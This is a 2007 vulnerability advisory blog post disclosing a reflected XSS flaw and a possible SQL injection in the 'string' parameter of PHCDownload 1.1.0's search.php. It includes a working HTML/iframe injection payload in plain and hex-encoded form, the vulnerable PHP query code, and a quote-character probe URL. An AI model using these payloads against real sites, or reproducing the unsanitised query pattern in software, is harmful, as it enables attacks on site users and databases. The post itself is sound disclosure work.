###############################################
XSS Flaw & posible SQL injection in PHCDownload
vendor url: http://www.phpcredo.com/
Advisore: http://lostmon.blogspot.com/2007/12/
xss-flaw-posible-sql-injection-in.html
vendor notify:YES exploit available: YES
###############################################
New XSS Flaw & posible SQL injection in search.php
PHCDownload contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate 'string' variable upon submission to 'search.php'
script.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,
leading to a loss of integrity.
verions:
1.1.0 afected.
example :
we can try inject some normal html or javascript code:
Code:
"><h1><a href="http://lostmon.blogspot.com">Lostmon</a> Was Here !!!</h1><br><h1>XSS Pow@ !!!</h1><p><iframe src="http://lostmon.blogspot.com"></iframe></p>
or inject directly the code in hex values :
Code:
%22%3E%3C%68%31%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%3C%2F%61%3E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%62%72%3E%3C%68%31%3E%58%53%53%20%50%6F%77%40%20%21%21%21%3C%2F%68%31%3E%3C%70%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E
example in hex:
http://localhost/phcdownload/search.php?string=[XSS-CODE]
also this variable is prone vulnerable too to SQL injections.
if we look the source code of search.php arround line 36 we have :
Code:
// Prepare search query
if( $kernel->config['archive_search_mode'] == 1 )
{
$search_syntax = "MATCH( f.file_name, f.file_description, f.file_version, f.file_author ) AGAINST ( '*{$kernel->vars['string']}*' IN BOOLEAN MODE )";
}
else
{
$search_syntax = "MATCH( f.file_name, f.file_description, f.file_version, f.file_author ) AGAINST ( '*{$kernel->vars['string']}*' )";
}
the value of 'string' is inserted directly in the sql query and this could be dangerous...
we can try to disclose the query :
http://localhost/phcdownload/upload/search.php?string='
i make several probes , but i don´t have found a working exploit or a
exploitable angle to this issue , but ...need to be patch
Thnx to estrella to be my ligth
Thnx to all Lostmon´s Group Team
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)